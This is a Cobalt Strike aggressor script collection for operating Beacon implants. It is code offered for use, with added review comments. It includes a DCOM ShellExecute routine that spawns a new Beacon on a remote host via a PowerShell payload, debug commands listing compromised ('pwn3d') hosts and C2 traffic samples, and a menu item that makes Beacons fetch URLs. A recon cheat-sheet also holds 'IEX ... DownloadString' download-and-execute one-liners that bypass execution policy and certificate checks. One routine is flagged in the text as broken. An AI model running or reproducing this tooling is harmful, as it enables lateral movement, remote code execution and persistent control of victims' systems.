    if ($typed eq "ls") {
        %OPERATING_BEACONS[$1]['cwd-use-ls'] = 1;
    }
}
on beacon_output_ls {
    # $1 = bid, $2 = ls output. If the pending flag from beacon_input is set, the first output line
    # (minus a trailing "\*") is the directory that was listed; record it and clear the flag.
    local('$firstLine');
    if (%OPERATING_BEACONS[$1]['cwd-use-ls'] != 1) {
        return;
    }
    $firstLine = split("\n", ["$2" trim])[0];
    if (right($firstLine, 2) eq "\\*") {
        $firstLine = substr($firstLine, 0, -2);
    }
    %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd'];
    %OPERATING_BEACONS[$1]['cwd'] = $firstLine;
    %OPERATING_BEACONS[$1]['cwd-use-ls'] = 0;
}
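on beacons {
    # $1 = array of Beacon entries (hashes shaped like beacons(), keyed by 'id' — TODO confirm).
    # Make sure every known Beacon has a state hash, without touching the ones we already track.
    # The original compared the whole entry against keys(%OPERATING_BEACONS) and then reset the
    # entry when the test was TRUE, i.e. the logic was inverted and would have wiped a tracked cwd.
    local('%entry $id');
    if (%OPERATING_BEACONS is $null) {
        %OPERATING_BEACONS = %();
    }
    foreach %entry ($1) {
        $id = %entry['id'];
        if ($id in %OPERATING_BEACONS) {
            continue;
        }
        %OPERATING_BEACONS[$id] = %();
    }
}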
alias cd {
    # cd <dir>, or "cd -" to return to the previously tracked directory (when one is known).
    local('$previous');
    $previous = %OPERATING_BEACONS[$1]['prev-cwd'];
    if (($2 eq "-") && (strlen($previous) > 0)) {
        bcd($1, $previous);
    }
    else {
        bcd($1, $2);
    }
}
# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2
# Register alias
# Help entry for the dcom_shellexecute alias.
beacon_command_register("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", "Usage: dcom_shellexecute [target] [listener]\n\nSpawn new Beacon on a target via DCOM ShellExecute Object.");
# Alias for dcom_shellexecute
alias dcom_shellexecute {
    # dcom_shellexecute <target> [listener]; without a listener the payload chooser is shown first.
    local('$bid $target $listener');
    ($bid, $target, $listener) = @_;
    if ($listener is $null) {
        openPayloadHelper(lambda({
            dcom_shellexecute($bid, $target, $1);
        }, $bid => $bid, $target => $target));
        return;
    }
    dcom_shellexecute($bid, $target, $listener);
}
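sub dcom_shellexecute {
    # $1 = bid, $2 = target host, $3 = listener.
    # Instantiates the ShellWindows COM class (CLSID 9BA05972-...) on the target and calls
    # ShellExecute("powershell.exe", <one-liner>) through it; the script that does so is hosted by
    # the team server (beacon_host_script) and fetched by the current Beacon via bpowershell.
    # Artefacts to expect on the target: a DCOM activation and a powershell.exe child of
    # explorer.exe with the x86 one-liner on its command line. The operator-supplied $2 is spliced
    # unescaped into a PowerShell string literal.
    # Fix vs. original: $short was not declared local and leaked into the global scope.
    local('$payload $cmd $short');
    btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM ShellExecute");
    # x86 one-liner; the leading "powershell.exe " is stripped because ShellExecute receives the
    # binary as its own argument.
    $payload = powershell($3, true, "x86");
    $payload = strrep($payload, "powershell.exe ", "");
    $cmd = '[Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "';
    $cmd .= $2;
    $cmd .= '")).Item().Document.Application.ShellExecute("powershell.exe", "';
    $cmd .= $payload;
    $cmd .= '", "C:\Windows\System32\WindowsPowershell\v1.0",';
    $cmd .= '$null,0)';
    # Use beacon_host_script to generate a shorter DownloadString payload that we can use w/ make_token
    $short = beacon_host_script($1, $cmd);
    bpowershell($1, $short);
}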
# DCOM Outlook remote code execution.
# NOTE(review): unfinished and not wired to any alias/command in this file. $cmd is incomplete —
# the parentheses are unbalanced and it references neither $2 (the target) nor $payload — so as
# written it would hand the Beacon a PowerShell snippet that cannot parse. Treat it as a placeholder
# and do not register an alias for it until it is completed.
sub dcom_outlook {
local('$payload $cmd');
# Acknowledge task
btask($1, "Tasked Beacon to run (" . listener_describe($3, $2) . ") via DCOM Outlook");
# Generate PowerShell one-liner for payload ($payload is built but never used below)
$payload = powershell($3, true, "x86");
$payload = strrep($payload, "powershell.exe ", "");
$cmd = "[System.Activator]::CreateInstance([Type]::GetTypeFromProgID('Outlook.Application').CreateObject(\"ScriptControl\")";
# Use beacon_host_script to generate a shorter DownloadString
# payload that we can use w/ make_token
$short = beacon_host_script($1, $cmd);
bpowershell($1, $short);
}
#DebugKit
# This kit is limited to actions that I use for development and debugging, and thus is not loaded with the rest of them.
# @Und3rf10w
command !beaconinfo {
    # Script-console listing of every Beacon id with its hostname.
    local('%b');
    foreach %b (beacons()) {
        println("Beacon ID: " . %b['id'] . " is " . %b['computer']);
    }
}
# This basically shows the powershell commandlets loaded for every beacon
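command !loaded_powershell {
    # Print, for every Beacon that has imported a PowerShell script, the cmdlets the model lists
    # for it. The 'cmdlets' data model is fetched once instead of twice per Beacon, and the loop
    # variable is local rather than a script global.
    local('%cmdlets %b $id');
    %cmdlets = data_query('cmdlets');
    foreach %b (beacons()) {
        $id = %b['id'];
        if (%cmdlets[$id] ne $null) {
            println("\c7ID: \cF" . $id . ",\c3 Hostname: \cF" . %b['computer'] . ",\c4 Cmdlets Enabled: \cF" . %cmdlets[$id]);
        }
    }
}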
# This shows what responses generated by the c2 server would look like
command !c2_sample_server {
    # Print the sample server response from the malleable-profile metadata.
    local('%meta');
    %meta = data_query('metadata');
    println(%meta['c2sample.server']);
}
# This shows what requests generated by the clients look like
command !c2_sample_client {
    # Print the sample client request from the malleable-profile metadata.
    local('%meta');
    %meta = data_query('metadata');
    println(%meta['c2sample.client']);
}
# This shows a list of everyone that's connected to the teamserver:
command !who {
    # List the operators currently connected to this team server.
    local('$operator');
    println("\c7Currently logged on users on this teamserver are:");
    foreach $operator (data_query('users')) {
        println("\c3 * \cF $operator");
    }
}
# This command shows a hostname of every sessions that happened, active or inactive. Basically just to provide a list of pwned hosts.
command !pwn3d_hosts {
    # One line per session ever recorded (active or not), so a host with several sessions is
    # printed several times.
    local('%session');
    foreach %session (data_query('sessions')) {
        println(%session['computer']);
    }
}
# Shows the queryable Keys within cobalt strike's data model
command !show_data_keys {
    # List every key that !query_data_key can be pointed at.
    local('$key');
    foreach $key (data_keys()) {
        println("\n\c4=== $key ===");
    }
}
# Queries the specified key within cobalt strike's data model
# USAGE: !query_data_key <key_name>
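command !query_data_key {
    # USAGE: !query_data_key <key_name>   (see !show_data_keys for the valid names)
    # Dumps the raw data-model value for the key. The key name is now required and local.
    local('$keyName');
    $keyName = $1;
    if (strlen($keyName) == 0) {
        println("\c4USAGE: !query_data_key <key_name> (see !show_data_keys)");
        return;
    }
    println("\n\c4=== Data for \c8\U$keyName\U \c4data key ===\n");
    println(data_query($keyName));
}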
# Syncs all of the downloads on the teamserver to a specified path. Recursively recreates the file structure as it was on the system the file was downloaded from
# This is not very safe to use.
# TODO: Figure out how to get the content of a file stored on the teamserver
# USAGE: !sync_all_downloads [/path/on/client/machine/to/save/downloads/to] <IP address of host to download files for>
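command !sync_all_downloads {
    # USAGE: !sync_all_downloads </path/on/client/to/save/downloads/to> [host]
    # Today this only validates (and if needed creates) the destination directory on the CLIENT
    # machine; the copy itself is still the TODO in the commented draft below.
    # Fixes vs. original: $1 is required; the typo'd $filepath (never assigned) is gone from the
    # mkdir/permission messages; failures return instead of calling exit(), which would have torn
    # down the script rather than just this command.
    local('$dest');
    $dest = $1;
    if (strlen($dest) == 0) {
        println("\c4USAGE: !sync_all_downloads </path/to/save/downloads/to> [host]");
        return;
    }
    if (!-exists $dest) {
        mkdir($dest);
    }
    # Also catches a failed mkdir above.
    if (!-isDir $dest) {
        println("\c4 $dest is not a directory");
        return;
    }
    if (!-canwrite $dest) {
        println("\c4 We can not write to $dest (check permissions?)");
        return;
    }
    # Draft of the sync loop (the original file carried a second, identical copy of this draft):
    # foreach $file (downloads()){
    # if ($2){
    # if ( ! $file['host'] eq $2 ){
    # continue
    # }
    # }
    # println("Processing download for " . size(downloads()) . " files...");
    # $newpath = $file['path'];
    # $newpath = strrep($newpath, "\\", "/");
    # if ($newpath eq ""){ $newpath = "/"; } # Sanity check in the event that the new path is blank
    # $newpath = $file_path + "/" + $file['host'] + "/" + $newpath;
    # if (!-exists $newpath){
    # mkdir($newpath);
    # }
    # $fullfile = $newpath + $file['name'];
    # TODO: Figure out how to get the content of a file sitting on the teamserver
    # if (checkError($error)) {
    # println("Error received while trying to write " . $fullfile . ": $error");
    # }
    # if (-canwrite $fullfile){
    # $handle = openf(">>$fullfile");
    # println($handle, $fileontheCSServer); #See TODO
    # closef($handle);
    # } else {
    # println("Error while trying to write to $fullfile");
    # }
    # }
}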
# Generates and displays a process tree for the selected beacon.
# Use this to determine your current beacon's exposure to HIDS.
# I've run into situations where HIDS/AV will attempt to kill as many parents of a malicious process as possible.
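sub pstreeBpsArray {
    # bps() callback: $1 = bid, $2 = raw ps output. Builds the ancestry of the Beacon's own process
    # and prints it to the Beacon console.
    # treeBuilder() and pstreeCreate() work on the script-global @tree / $treeoutput; both are reset
    # here so a second run does not append to the previous tree (the original never cleared them).
    local('@lines $beaconPid $rendered');
    @lines = split('\n', $2);
    $beaconPid = beacon_info($1, "pid");
    @tree = @();
    $treeoutput = "";
    treeBuilder(@lines, $beaconPid, 0);
    $rendered = pstreeCreate(@tree, size(@tree));
    blog($1, $rendered);
}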
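sub treeBuilder {
    # $1 = ps output lines, $2 = pid to look up, $3 = depth (index into the global @tree).
    # Walks from the given pid up through its parents, filling @tree[depth] = (name, pid, ppid).
    # Each ps line is split on whitespace as name, ppid, pid — a process name containing a space
    # will mis-parse (not handled here).
    # Fixes vs. original: the recursive call passed "$x++", which does not hand the next level a
    # larger index, so every level overwrote @tree[0]; and there was no stop condition, so a process
    # listed as its own parent recursed forever. The depth cap is a belt-and-braces guard.
    local('@lines $wanted $depth $entry $name $ppid $pid');
    (@lines, $wanted, $depth) = @_;
    if ($depth >= 64) {
        return;
    }
    foreach $entry (@lines) {
        ($name, $ppid, $pid) = split("\\s+", $entry);
        if ($pid eq $wanted) {
            @tree[$depth][0] = $name;
            @tree[$depth][1] = $pid;
            @tree[$depth][2] = $ppid;
            if ($ppid eq $pid) {
                return;
            }
            treeBuilder(@lines, $ppid, $depth + 1);
            return;
        }
    }
}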
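sub pstreeCreate {
    # $1 = @tree as filled by treeBuilder (index 0 = the Beacon process), $2 = number of entries.
    # Renders root first, one extra tab per hop, into the script-global $treeoutput (kept global
    # because pstreeBpsArray reads it) and returns the same string.
    # Fix vs. original: $treeoutput is reset at the start instead of growing across calls; the
    # debug println of the whole array is gone.
    local('@entries $count $i $depth');
    (@entries, $count) = @_;
    $treeoutput = "";
    $depth = 0;
    for ($i = $count - 1; $i >= 0; $i--) {
        # No connector before the root entry, nor for an entry without a name.
        if (($i != $count - 1) && (@entries[$i][0] ne $null)) {
            $treeoutput .= "\n" . ("\t" x $depth) . "↳ ";
        }
        $treeoutput .= "(" . @entries[$i][1] . ") " . @entries[$i][0];
        $depth++;
    }
    return $treeoutput;
}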
# This alias checks whether CS thinks the beacon is an admin based on the '-isadmin' function
alias !iscsadmin {
    # Report whether Cobalt Strike's own -isadmin predicate considers this Beacon elevated.
    local('$verdict');
    $verdict = iff(-isadmin $1, "Beacon is admin", "Beacon is not admin");
    blog($1, $verdict);
}
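# bids that asked for a check-in notification; consumed by the single beacon_checkin handler below.
global('%NOTIFY_ON_CHECKIN');
%NOTIFY_ON_CHECKIN = %();
# One handler for the whole client. The original registered a fresh "on beacon_checkin" inside the
# menu item, i.e. one more (unfiltered) handler per click, each logging every Beacon's check-ins.
on beacon_checkin {
    if ($1 in %NOTIFY_ON_CHECKIN) {
        elog("Beacon: " . $1 . " checked in at $3 as requested");
        removeAt(%NOTIFY_ON_CHECKIN, $1);
    }
}
# Right-click menu; $1 is the array of selected beacon ids.
popup beacon_bottom {
    menu "DebugKit" {
        item "Notify at next check-in" {
            local('$bid');
            foreach $bid ($1) {
                openOrActivate($bid);
                %NOTIFY_ON_CHECKIN[$bid] = 1;
                binput($bid, "checkin");
                bcheckin($bid);
            }
        }
        item "Display Beacon ID" {
            local('$bid');
            foreach $bid ($1) {
                openOrActivate($bid);
                blog($bid, "This beacon's ID is: " . binfo($bid, "id"));
            }
        }
        item "HTTP Egress" {
            # Ask once for the URL and task every selected Beacon from the callback. prompt_text()
            # delivers the answer only to its callback, so the original's read-after-sleep(1) raced
            # the dialog, and it tasked $1 (the whole selection array) instead of each bid.
            # This fetches the URL from the target with WebClient; pick a URL you are happy to have
            # in the target's proxy logs.
            prompt_text("URL to assess?", "http://google.com", lambda({
                local('$bid $probe');
                $probe = "(New-Object System.Net.WebClient).DownloadString(\" $+ $1 $+ \")";
                foreach $bid (@bids) {
                    binput($bid, "powershell $probe");
                    bpowershell($bid, $probe);
                }
            }, @bids => $1));
        }
        item "Show beacon's process tree" {
            # bps() hands its output to pstreeBpsArray, which renders and blogs the tree.
            local('$bid');
            foreach $bid ($1) {
                blog($bid, "Generate this beacon's process tree...");
                bps($bid, &pstreeBpsArray);
            }
        }
        menu "Loaded PowerShell" {
            item "Are PowerShell scripts loaded?" {
                local('$bid %cmdlets');
                %cmdlets = data_query('cmdlets');
                foreach $bid ($1) {
                    openOrActivate($bid);
                    if (%cmdlets[$bid] ne $null) {
                        blog($bid, "\c7PowerShell Import Checker Status\cF:\c3 YES, ACTIVE POWERSHELL IMPORT\cF");
                    }
                    else {
                        blog($bid, "\c7PowerShell Import Checker Status\cF:\c4 NO ACTIVE POWERSHELL IMPORTS\cF");
                    }
                }
            }
            item "Show loaded PowerShell functions" {
                local('$bid %cmdlets');
                %cmdlets = data_query('cmdlets');
                foreach $bid ($1) {
                    openOrActivate($bid);
                    if (%cmdlets[$bid] ne $null) {
                        blog($bid, "\c7Current active PowerShell modules for this Beacon are: \cF" . %cmdlets[$bid]);
                    }
                    else {
                        berror($bid, "\c4ERROR! No active powershell modules");
                    }
                }
            }
        }
    }
}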
# Right-click menu on SSH sessions; $1 is the array of selected session ids.
popup ssh {
    menu "DebugKit" {
        item "Display Session ID" {
            local('$sid');
            foreach $sid ($1) {
                openOrActivate($sid);
                blog($sid, "This session's ID is: " . binfo($sid, "id"));
            }
        }
    }
}
# defs.cna
# Definitions for all the tips and commands.
# Mostly r3dqu1nn's work, with a bit of help from 001SPARTaN
# @database = @(%($cmd, $desc, @tags), %($cmd, $desc, @tags))
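# Command cheat-sheet, searched by tag. Each entry is a hash with:
#   cmd  - the command text shown to the operator (a literal; placeholders
#          such as [options] or <name> are part of the displayed text)
#   desc - one-line description shown next to the command
#   tags - keywords the lookup matches against (the consumer lives
#          elsewhere in the script and is not visible here)
# The former second copy of the 'schtasks [options]' entry has been dropped
# so a tag search does not return it twice, and stray trailing commas in
# two tag lists are gone.
@database = @(
%(cmd => 'ipconfig /all', desc => 'Display all network information for all interfaces.', tags => @(
'network', 'networking', 'interfaces', 'utility', 'recon', 'enum', 'ipconfig'
)
),
%(cmd => 'systeminfo', desc => 'Display info about the system. Tip: Use | findstr to pipe out individual options.', tags => @(
'system', 'info', 'information', 'recon', 'enum', 'privesc', 'systeminfo', 'system info'
)
),
%(cmd => 'route print', desc => 'Display network routes.', tags => @(
'network', 'route', 'routes', 'print', 'recon', 'enum'
)
),
%(cmd => 'arp -a', desc => 'Display ARP table.', tags => @(
'network', 'arp', 'recon', 'enum'
)
),
%(cmd => 'wmic computersystem get [options]', desc => 'Get detailed information about the system with wmic. Use [/?] for a complete list of options', tags => @(
'computer', 'wmic', 'system', 'recon', 'enum'
)
),
%(cmd => 'wmic desktop get [options]', desc => 'Get detailed information about the desktop with wmic. Use [/?] for a complete list of options', tags => @(
'desktop', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic netlogin get [options]', desc => 'Get detailed information about netlogin with wmic. Use [/?] for a complete list of options', tags => @(
'netlogin', 'login', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic process get [options]', desc => 'Get detailed information about processes with wmic. Use [/?] for a complete list of options', tags => @(
'process', 'processes', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic service get [options]', desc => 'Get detailed information about services with wmic. Use [/?] for a complete list of options', tags => @(
'services', 'service', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic volume get [options]', desc => 'Get detailed information about volumes/drives with wmic. Use [/?] for a complete list of options', tags => @(
'volume', 'drives', 'recon', 'enum', 'wmic'
)
),
%(cmd => 'wmic netuse list full', desc => 'Get a full list of mapped drives with wmic.', tags => @(
'netuse', 'drives', 'recon', 'enum', 'wmic', 'mapped'
)
),
%(cmd => 'wmic startup get [options]', desc => 'Get detailed information regarding the startup of the system with wmic. Use [/?] for a complete list of options.', tags => @(
'startup', 'boot', 'bootup', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic PRODUCT get [options]', desc => 'Get detailed information about the installed software on the system with wmic. Use [/?] for a complete list of options.', tags => @(
'product', 'software', 'install', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic qfe get [options]', desc => 'Get detailed information about hotfixes installed on the system with wmic. Use [/?] for a complete list of options.', tags => @(
'qfe', 'patches', 'hotfix', 'enum', 'recon', 'kb', 'wmic'
)
),
%(cmd => 'wmic ntdomain get [options]', desc => 'Get detailed information about the Domain Controller on the network with wmic. Use [/?] for a complete list of options.', tags => @(
'ntdomain', 'DomainController', 'domain', 'dc', 'enum', 'recon', 'wmic'
)
),
%(cmd => 'wmic bios list full', desc => 'Get detailed information about the BIOS on the system with wmic.', tags => @(
'computer', 'hardware', 'bios', 'install', 'enum', 'recon', 'wmic'
)
),
# SET lists every environment variable, not only %PATH%; the description
# now says so.
%(cmd => 'SET', desc => 'Display all environment variables (%PATH% among them).', tags => @(
'computer', 'variables', 'set', 'enum', 'recon', 'user'
)
),
%(cmd => 'netstat -ano', desc => 'Get detailed information about network connections on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'netstat -ano | findstr /I listening', desc => 'Get detailed information about network connections listening on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'netstat -ano | findstr /I established', desc => 'Get detailed information about network connections established on the system. Use netstat [/?] for a complete list of options.', tags => @(
'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
)
),
%(cmd => 'nbtstat -A [Target IP]', desc => 'Returns the NetBIOS name table and MAC address of the address card for the remote computer name specified.', tags => @(
'computer', 'nbtstat', 'network', 'mac', 'enum', 'recon', 'NetBIOS'
)
),
%(cmd => 'nslookup', desc => 'Displays information that you can use to diagnose Domain Name System (DNS) infrastructure. Resolve IP <--> Domain Name.', tags => @(
'computer', 'nslookup', 'network', 'dns', 'lookup', 'enum', 'recon'
)
),
%(cmd => 'reg query [keyname]', desc => 'Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.', tags => @(
'registry', 'query', 'reghive', 'regedit', 'enum', 'recon'
)
),
%(cmd => 'reg add [keyname] [options]', desc => 'Adds a new subkey or entry to the registry.', tags => @(
'registry', 'add', 'reghive', 'regedit', 'enum', 'recon'
)
),
%(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @(
'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'sc [options]', desc => 'Communicates with the Service Controller and installed services. SC.exe retrieves and sets control information about services.', tags => @(
'sc', 'service', 'controller', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'sc [ServerName] qc [ServiceName] [BufferSize]', desc => 'Queries the configuration information for a service.', tags => @(
'sc', 'qc', 'service', 'controller', 'enum', 'recon', 'tasks'
)
),
%(cmd => 'tasklist (/S Remote Computer) [options]', desc => 'Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.', tags => @(
'schtasks', 'list', 'time', 'persistence', 'enum', 'recon', 'tasklist', 'processes', 'process'
)
),
%(cmd => 'driverquery [/s Computer] [/u Domain\User /p Password]', desc => 'Displays a list of all installed device drivers and their properties.', tags => @(
'driver', 'driverquery', 'computer', 'hardware', 'enum', 'recon'
)
),
%(cmd => 'gpresult /s <COMPUTER> /u <USERNAME> [options]', desc => 'Displays the Resultant Set of Policy (RSoP) information for a remote user and computer.', tags => @(
'firewall', 'RSOP', 'GPO', 'Group Policy', 'enum', 'recon', 'rules'
)
),
%(cmd => 'whoami /groups /all [options]', desc => 'Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name.', tags => @(
'user', 'groups', 'privileges', 'logon', 'enum', 'recon'
)
),
%(cmd => 'netsh firewall (advfirewall) show conf', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer. Use firewall to query firewall information.', tags => @(
'netsh', 'network', 'config', 'firewall', 'enum', 'recon', 'rules'
)
),
%(cmd => 'netsh wlan show profiles', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer.', tags => @(
'netsh', 'network', 'config', 'wlan', 'enum', 'recon', 'rules'
)
),
#net commands
%(cmd => 'net accounts [/domain]', desc => 'Updates the user accounts database and modifies password and logon requirements for all accounts.', tags => @(
'net', 'network', 'config', 'accounts', 'enum', 'recon', 'user', 'modify', 'domain', 'display'
)
),
%(cmd => 'net group "groupname" [/domain]', desc => 'Adds, displays, or modifies global groups in the domain.', tags => @(
'net', 'network', 'config', 'groups', 'recon', 'enum', 'domain', 'display'
)
),
%(cmd => 'net localgroup "groupname" [/domain]', desc => 'Adds, displays, or modifies local groups in the domain.', tags => @(
'net', 'network', 'config', 'localgroup', 'enum', 'recon', 'domain', 'display'
)
),
%(cmd => 'net view [/domain]', desc => 'Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain.', tags => @(
'net', 'network', 'config', 'view', 'enum', 'recon', 'display', 'computers', 'domain'
)
),
%(cmd => 'net session [\\ComputerName]', desc => 'Manages server computer connections. Used without parameters, net session displays information about all sessions with the local computer.', tags => @(
'net', 'network', 'config', 'session', 'enum', 'recon', 'display'
)
),
%(cmd => 'net share [options]', desc => 'Manages shared resources. Used without parameters, net share displays information about all of the resources that are shared on the local computer.', tags => @(
'net', 'network', 'config', 'resources', 'enum', 'recon', 'share', 'display'
)
),
%(cmd => 'net user [username] [/domain]', desc => 'Adds or modifies user accounts or displays user account information.', tags => @(
'net', 'network', 'config', 'user', 'enum', 'recon', 'domain', 'display'
)
),
%(cmd => 'net use * \\IP\Share /user:username [password]', desc => 'Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.', tags => @(
'net', 'network', 'use', 'pivot', 'authentication', 'resource', 'domain', 'connection', 'shared'
)
),
#powershell
%(cmd => 'IEX (New-Object Net.WebClient).DownloadString(\'http://IP/URI\')', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download'
)
),
%(cmd => 'powershell -executionpolicy bypass -nop -noni -c \'\'\'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {1};IEX (New-Object Net.WebClient).DownloadString(\"https://IP/URI\")\'\'\'', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download', 'SSL'
)
),
%(cmd => '\$code=\'code goes here\'\;[convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Encodes a byte array as a Base64 string', tags => @(
'string', 'base64', 'encode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
)
),
# NOTE(review): the decode entry below feeds GetBytes() output to
# FromBase64String, which takes a Base64 *string*; the command text is kept
# as the author wrote it but should be checked before use.
%(cmd => '\$code=\'code goes here\'\;[convert]::FromBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Decodes a byte array from a Base64 string', tags => @(
'string', 'base64', 'decode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
)
),
%(cmd => 'cat (Get-PSReadlineOption).HistorySavePath', desc => 'Shows all history for PS5 commands entered', tags => @(
'recon', 'stored', 'powershell', 'enum', 'history', 'commands'
)
),
%(cmd => 'Get-ADUser -Filter \* \|Where-Object \{\$_.Enabled -eq $false\}', desc => 'Returns all disabled user accounts', tags => @(
'recon', 'AD', 'powershell', 'enum', 'disabled', 'accounts', 'user'
)
),
%(cmd => 'Get-ADUser -Enabled -PasswordNeverExpires:$true', desc => 'Returns all accounts with non-expiring passwords', tags => @(
'recon', 'AD', 'powershell', 'enum', 'expire', 'accounts', 'user'
)
),
%(cmd => 'Get-ADUser -Filter \{SmartCardLogonRequired -eq $false\}', desc => 'Returns all accounts with no smart card required', tags => @(
'recon', 'AD', 'powershell', 'enum', 'smartcard', 'accounts', 'user', 'CAC'
)
),
%(cmd => 'Get-ADComputer -Filter \{OperatingSystem -Like \"Windows *Server*\"\} -Property * | Format-Table Name,OperatingSystem,OperatingSystemServicePack -Wrap -Auto', desc => 'Returns all AD Computers in a format-table', tags => @(
'recon', 'AD', 'powershell', 'enum', 'computer', 'windows server', 'OS', 'Server'
)
),
%(cmd => '(new-object Net.Sockets.TcpClient).Connect("IP", PORT)', desc => 'Tests network port access to see if the port is open', tags => @(
'recon', 'tcp', 'powershell', 'enum', 'computer', 'sockets', 'IP', 'Port', 'network'
)
),
%(cmd => '[System.Net.Dns]::GetHostbyAddress("8.8.8.8")', desc => 'Resolve IP to hostname', tags => @(
'recon', 'powershell', 'net', 'hostname', 'IP', 'dns', 'network'
)
),
%(cmd => '[System.Net.Dns]::GetHostEntry("host.domain")', desc => 'Resolve hostname to IP', tags => @(
'recon', 'powershell', 'net', 'dns', 'IP', 'hostname', 'network'
)
),
#dsquery
%(cmd => 'dsquery computer -name <name>*', desc => 'Search for computers with a name similar to <name>.', tags => @(
'computer', 'name', 'dsquery', 'recon', 'enum'
)
),
%(cmd => 'dsquery * \"CN=System,DC=computer\" -filter \"\(objectClass=trustedDomain\)\" -attr TrustPartner,FlatName,TrustDirection', desc => 'Search for Domain Controllers that are trusted and have Trust relationships within the domain', tags => @(
'computer', 'dsquery', 'recon', 'enum', 'domain controller', 'domain', 'trust'
)
),
%(cmd => 'dsquery group -name \"domain admins\" |dsget group -members -expand', desc => 'Search for Domain Admins in the domain using dsquery', tags => @(
'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'admins'
)
),
%(cmd => 'dsquery user -name <username> |dsget user -memberof -expand', desc => 'Query a specific user in the domain and the groups they are a member of using dsquery', tags => @(
'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'user'
)
),
%(cmd => 'dsquery * domainroot -filter \"\(&\(objectCategory=Person\)\(objectClass=User\)\(userAccountControl:1.2.840.113556.1.4.803:=32\)\)\"', desc => 'Query user accounts with no passwords required with dsquery', tags => @(
'accounts', 'dsquery', 'recon', 'enum', 'passwords', 'domain'
)
),
%(cmd => 'dsquery subnet -limit 0', desc => 'Returns subnet information in AD sites and services with dsquery', tags => @(
'subnet', 'dsquery', 'recon', 'enum', 'AD', 'sites', 'services'
)
),
%(cmd => 'dsquery OU', desc => 'Returns all OU information in AD with dsquery', tags => @(
'subnet', 'dsquery', 'recon', 'enum', 'AD', 'OU'
)
),
#MSSQL
%(cmd => 'sqlcmd -s localhost -q "exec sp_databases"', desc => 'Returns list of local MSSQL databases', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT count(*) FROM TABLE"', desc => 'Returns number of entries in TABLE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT TOP 10 * FROM TABLE"', desc => 'Returns top 10 rows from TABLE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
%(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT * FROM SYSOBJECTS WHERE TYPE = \'U\' ORDER BY NAME"', desc => 'Returns list of table names in DATABASE', tags => @(
'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
)
),
#Linux
%(cmd => 'cat /etc/issue', desc => 'Verify Linux distro', tags => @(
'linux', 'etc', 'issue', 'cat', 'distro'
)
),
%(cmd => 'cat /etc/*-release', desc => 'Verify exact version and distribution for Linux', tags => @(
'linux', 'cat', 'etc', 'release', 'version', 'distro'
)
),
%(cmd => 'cat /etc/*-release | grep -E \'\"NAME=\"|ID|VERSION|ID_LIKE\'', desc => 'Verify exact version and distribution for Linux', tags => @(
'linux', 'cat', 'etc', 'release', 'version', 'distro'
)
),
%(cmd => 'cat /proc/version', desc => 'Verify Linux version using proc', tags => @(
'linux', 'cat', 'proc', 'version', 'distro'
)
),
%(cmd => 'rpm -q kernel', desc => 'Get detailed information about the kernel', tags => @(
'linux', 'rpm', 'kernel'
)
),
%(cmd => 'dmesg | grep Linux', desc => 'Output kernel messages for Linux', tags => @(
'linux', 'dmesg', 'grep', 'kernel'
)
),
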